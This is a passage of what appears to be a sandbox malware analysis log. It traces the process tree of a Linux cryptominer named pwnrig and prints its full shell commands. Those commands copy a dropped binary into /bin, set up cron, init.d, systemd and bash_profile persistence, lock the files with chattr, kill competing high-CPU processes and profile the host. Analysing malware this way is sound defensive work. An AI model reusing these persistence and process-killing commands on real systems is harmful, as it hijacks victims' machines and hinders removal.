\$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"3⤵
- Attempts to change immutable files
- Writes file to tmp directory
PID:1869 -
/usr/bin/idid -u4⤵PID:1870
/usr/bin/idid -u4⤵PID:1871
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"4⤵PID:1872
/bin/rmrm -rf /bin/bprofr4⤵PID:1873
/bin/sedsed -i /bprofr/d "~/.bash_profile"4⤵PID:1874
/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr4⤵
- Writes file to system bin folder
/usr/bin/idid -u4⤵PID:1876
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"4⤵PID:1877
/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly4⤵PID:1878
/usr/bin/chattrchattr -i -a "/etc/cron.*/pwnrig" /bin/crondr4⤵
- Attempts to change immutable files
/bin/rmrm -rf /bin/crondr4⤵PID:1880
/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr4⤵
- Writes file to system bin folder
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵PID:1885
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵PID:1886
/usr/bin/whichwhich chkconfig4⤵PID:1887
/usr/bin/whichwhich update-rc.d4⤵PID:1888
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr4⤵PID:1889
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable4⤵
- Flushes firewall rules
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove4⤵PID:1891
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:1892
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:1892
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:1892
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:1892
/sbin/systemctlsystemctl daemon-reload5⤵PID:1892
/bin/systemctlsystemctl daemon-reload5⤵PID:1892
/bin/rmrm -rf /bin/initdr4⤵PID:1913
/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr4⤵
- Writes file to system bin folder
/usr/bin/teetee /etc/init.d/pwnrig4⤵
- Modifies init.d
/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig4⤵
- Modifies init.d
/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr4⤵PID:1918
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults4⤵PID:1919
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:1920
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:1920
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:1920
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:1920
/sbin/systemctlsystemctl daemon-reload5⤵PID:1920
/bin/systemctlsystemctl daemon-reload5⤵PID:1920
/usr/sbin/update-rc.dupdate-rc.d pwnrig enable4⤵PID:1941
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:1942
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:1942
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:1942
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:1942
/sbin/systemctlsystemctl daemon-reload5⤵PID:1942
/bin/systemctlsystemctl daemon-reload5⤵PID:1942
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr4⤵PID:1963
/usr/bin/whichwhich systemctl4⤵PID:1964
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵PID:1965
/bin/rmrm -rf /bin/sysdr4⤵PID:1966
/bin/cpcp -f -r -- /tmp/service-agent /bin/sysdr4⤵
- Writes file to system bin folder
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
- Modifies systemd
/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵PID:1970
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵PID:1971
/bin/systemctlsystemctl enable pwnrige.service4⤵PID:1972
/bin/systemctlsystemctl enable pwnrigl.service4⤵PID:1993
/bin/systemctlsystemctl daemon-reload4⤵PID:2014
/bin/systemctlsystemctl reload-or-restart pwnrige.service4⤵PID:2035
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d2⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:2077 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵PID:2101
/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:2130
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵PID:2132
/bin/psps -A "-ostat,ppid"4⤵
- Reads CPU attributes
/usr/bin/idid -u4⤵PID:2134
/bin/grepgrep -v grep4⤵PID:2137
/bin/grepgrep /etc/cron4⤵PID:2136
/bin/psps x4⤵
- Reads runtime system information
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:2139
/usr/bin/idid -u4⤵PID:2140
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵PID:2145
/bin/grepgrep -v /usr/sbin/httpd4⤵PID:2144
/bin/grepgrep -v -- "-bash[[:space:]]*\$"4⤵PID:2143
/bin/grepgrep -v grep4⤵PID:2142
/bin/psps aux4⤵
- Reads CPU attributes
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"3⤵PID:2147
/usr/bin/idid -u4⤵PID:2148
/usr/bin/crontabcrontab -r2⤵PID:2899
/usr/bin/pkillpkill -f .klibsystem52⤵
- Reads CPU attributes
- Reads runtime system information
/usr/bin/pkillpkill -f .klibsystem42⤵PID:2901
/bin/bashbash -c "echo \"* * * * * /run/user/.klibsystem5 >/dev/null 2>&1\" | crontab -"2⤵PID:2902
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
/usr/bin/chattrchattr -ia /etc/cron.d/.lib-knlib42⤵PID:2905
/usr/bin/chattrchattr +ia /etc/cron.d/.lib-knlib42⤵PID:2906
/usr/bin/chattrchattr -ia /var/spool/cron/.lib-knlib42⤵
- Attempts to change immutable files
/usr/bin/chattrchattr +ia /var/spool/cron/.lib-knlib42⤵PID:2908
/usr/bin/chattrchattr -ia /etc/cron.hourly/.lib-knlib42⤵
- Attempts to change immutable files
/usr/bin/chattrchattr +ia /etc/cron.hourly/.lib-knlib42⤵PID:2910
/usr/bin/chattrchattr -ia /etc/cron.daily/.lib-knlib42⤵PID:2911
/usr/bin/chattrchattr +ia /etc/cron.daily/.lib-knlib42⤵PID:2912
/usr/bin/chattrchattr -ia /etc/cron.weekly/.lib-knlib42⤵PID:2913
/usr/bin/chattrchattr +ia /etc/cron.weekly/.lib-knlib42⤵
- Attempts to change immutable files
/usr/bin/chattrchattr -ia /etc/cron.monthly/.lib-knlib42⤵PID:2915
/usr/bin/chattrchattr +ia /etc/cron.monthly/.lib-knlib42⤵PID:2916
/usr/bin/chattrchattr -ia /etc/anacrontab2⤵PID:2917
/usr/bin/chattrchattr +ia /etc/anacrontab2⤵
- Attempts to change immutable files
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn2⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:2919 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵PID:2920
/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:2949
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵PID:2951
/bin/psps -A "-ostat,ppid"4⤵PID:2950
/usr/bin/idid -u4⤵PID:2953
/bin/grepgrep -v grep4⤵PID:2956
/bin/grepgrep /etc/cron4⤵PID:2955
/bin/psps x4⤵
- Reads runtime system information
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\\\\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"3⤵
- Writes file to tmp directory
PID:2958 -
/usr/bin/idid -u4⤵PID:2959
/usr/bin/idid -u4⤵PID:2960
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"4⤵
- Attempts to change immutable files
/bin/rmrm -rf /bin/bprofr4⤵PID:2962
/bin/sedsed -i /bprofr/d "~/.bash_profile"4⤵PID:2963
/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr4⤵
- Writes file to system bin folder
/usr/bin/idid -u4⤵PID:2965
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"4⤵PID:2966
/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly4⤵PID:2967
/usr/bin/chattrchattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵PID:2968
/bin/rmrm -rf /bin/crondr4⤵PID:2969
/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr4⤵
- Writes file to system bin folder
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵PID:2974
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵PID:2975
/usr/bin/whichwhich chkconfig4⤵PID:2976
/usr/bin/whichwhich update-rc.d4⤵PID:2977
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr4⤵
- Attempts to change immutable files
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable4⤵
- Flushes firewall rules
PID:2979 -
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:2980
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:2980
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:2980
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:2980
/sbin/systemctlsystemctl daemon-reload5⤵PID:2980
/bin/systemctlsystemctl daemon-reload5⤵PID:2980
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove4⤵PID:3001
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:3002
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:3002
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:3002
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:3002
/sbin/systemctlsystemctl daemon-reload5⤵PID:3002
/bin/systemctlsystemctl daemon-reload5⤵PID:3002
/bin/rmrm -rf /bin/initdr4⤵PID:3023
/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr4⤵
- Writes file to system bin folder
/usr/bin/teetee /etc/init.d/pwnrig4⤵
- Modifies init.d
/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig4⤵
- Modifies init.d
/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr4⤵PID:3028
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults4⤵PID:3029
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:3030
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:3030
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:3030
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:3030
/sbin/systemctlsystemctl daemon-reload5⤵PID:3030
/bin/systemctlsystemctl daemon-reload5⤵PID:3030
/usr/sbin/update-rc.dupdate-rc.d pwnrig enable4⤵PID:3051
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:3052
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:3052
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:3052
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:3052
/sbin/systemctlsystemctl daemon-reload5⤵PID:3052
/bin/systemctlsystemctl daemon-reload5⤵PID:3052
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr4⤵PID:3073
/usr/bin/whichwhich systemctl4⤵PID:3074
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵PID:3075
/bin/rmrm -rf /bin/sysdr4⤵PID:3076
/bin/cpcp -f -r -- /tmp/service-agent /bin/sysdr4⤵
- Writes file to system bin folder
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
- Modifies systemd
/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
- Attempts to change immutable files
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵PID:3081
/bin/systemctlsystemctl enable pwnrige.service4⤵PID:3082
/bin/systemctlsystemctl enable pwnrigl.service4⤵PID:3103
/bin/systemctlsystemctl daemon-reload4⤵PID:3124
/bin/systemctlsystemctl reload-or-restart pwnrige.service4⤵PID:3145
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d2⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:3187 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵PID:3211
/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
